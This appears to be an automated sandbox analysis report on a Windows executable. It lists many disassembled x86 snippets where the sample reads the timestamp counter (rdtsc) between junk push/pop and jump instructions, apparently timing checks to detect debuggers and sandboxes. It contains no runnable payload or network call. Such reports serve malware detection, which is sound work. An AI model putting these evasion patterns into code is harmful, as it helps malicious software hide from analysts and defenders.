                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF1EC second address: 5EF21B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007F865CD192EEh 0x00000014 jmp 00007F865CD192E8h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF325 second address: 5EF32F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F865D1C554Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF521 second address: 5EF52B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF52B second address: 5EF5A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push ebx 0x0000000b jmp 00007F865D1C554Ah 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 xchg eax, esi 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F865D1C5548h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d pushad 0x0000002e pushad 0x0000002f jmp 00007F865D1C5556h 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 add dword ptr [ebp+122D2CFEh], edi 0x0000003d popad 0x0000003e nop 0x0000003f jmp 00007F865D1C5558h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007F865D1C5548h 0x0000004d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EFE73 second address: 5EFE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F00EB second address: 5F00EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F019A second address: 5CF194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b mov ch, 7Ch 0x0000000d call dword ptr [ebp+122D2E20h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F865CD192E1h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6265A5 second address: 6265AF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F865D1C5546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6265AF second address: 6265CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F865CD192E7h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6265CE second address: 6265D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6265D7 second address: 6265E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F865CD192D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62671A second address: 62671F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62671F second address: 626725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6269AD second address: 6269B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6269B3 second address: 6269B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6269B7 second address: 6269C1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626D93 second address: 626DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a ja 00007F865CD192D6h 0x00000010 jmp 00007F865CD192E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626DBB second address: 626DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626DC0 second address: 626DD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DFh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CAB3 second address: 59CAB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CAB7 second address: 59CAC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6352F8 second address: 6352FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637AD5 second address: 637ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637ADB second address: 637AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637AE6 second address: 637B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B02 second address: 637B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B07 second address: 637B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F865CD192DBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B18 second address: 637B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B1C second address: 637B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F865CD192DFh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jbe 00007F865CD192DEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B4B second address: 637B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B56 second address: 637B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 637B5F second address: 637B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A332 second address: 63A338 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E92D second address: 63E931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E4E2 second address: 63E4FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F865CD192D6h 0x0000000a jmp 00007F865CD192E3h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643B6C second address: 643B76 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F865D1C5546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643CB8 second address: 643CBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643CBE second address: 643CCC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F865D1C5548h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CA96 second address: 59CAB3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F865CD192DAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644136 second address: 64413D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6442A1 second address: 6442AB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6442AB second address: 6442BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F865D1C554Eh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6442BF second address: 6442CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6442CE second address: 6442DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6442DB second address: 6442E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6442E1 second address: 6442E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6442E5 second address: 6442FC instructions: 0x00000000 rdtsc 0x00000002 je 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F865CD192DDh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6450AD second address: 6450B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F865D1C5546h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6450B7 second address: 6450CA instructions: 0x00000000 rdtsc 0x00000002 js 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F865CD192D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64A969 second address: 64A988 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F865D1C5555h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64A988 second address: 64A9B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F865CD192E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F865CD192DDh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64A9B6 second address: 64A9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64A9BA second address: 64A9DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007F865CD192D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F865CD192E2h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64AB14 second address: 64AB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B4AE second address: 64B4D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F865CD192E6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B4D0 second address: 64B4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B4D4 second address: 64B4E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192DBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BA2E second address: 64BA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865D1C554Fh 0x00000009 pop esi 0x0000000a pushad 0x0000000b jnp 00007F865D1C5546h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BA4E second address: 64BA5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F865CD192D6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BA5B second address: 64BA61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BCEE second address: 64BD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192E8h 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BD0B second address: 64BD11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BD11 second address: 64BD15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BD15 second address: 64BD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865D1C5552h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F865D1C5555h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BD44 second address: 64BD4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C574 second address: 64C57B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651E5E second address: 651E63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654F48 second address: 654F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F865D1C5546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654F54 second address: 654F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F865CD192D6h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654F61 second address: 654F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5557h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654F7C second address: 654F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654F88 second address: 654F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F865D1C554Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655877 second address: 65587D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65587D second address: 655883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DD4A second address: 65DD52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DD52 second address: 65DD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DD56 second address: 65DD5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E161 second address: 65E1A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C5556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a je 00007F865D1C5557h 0x00000010 jmp 00007F865D1C5551h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F865D1C554Fh 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E1A6 second address: 65E1AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E4A1 second address: 65E4AF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F865D1C5546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65E4AF second address: 65E4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65EB98 second address: 65EBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jg 00007F865D1C5546h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65EBA7 second address: 65EBC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865CD192E2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661982 second address: 661988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 661988 second address: 661993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66673C second address: 666750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F865D1C554Fh 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6668E2 second address: 6668E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6668E8 second address: 6668F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F865D1C5546h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6690C5 second address: 6690D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F865CD192DBh 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6690D5 second address: 6690EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F865D1C554Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F865D1C5546h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67428E second address: 6742A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F865CD192DCh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679113 second address: 679117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679117 second address: 679125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F865CD192DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679125 second address: 679129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679129 second address: 679132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679132 second address: 67914C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jo 00007F865D1C5546h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67914C second address: 67915E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F865CD192D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F865CD192DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688A95 second address: 688A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 688A9B second address: 688ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F865CD192FDh 0x0000000d jmp 00007F865CD192E4h 0x00000012 jmp 00007F865CD192E3h 0x00000017 rdtsc
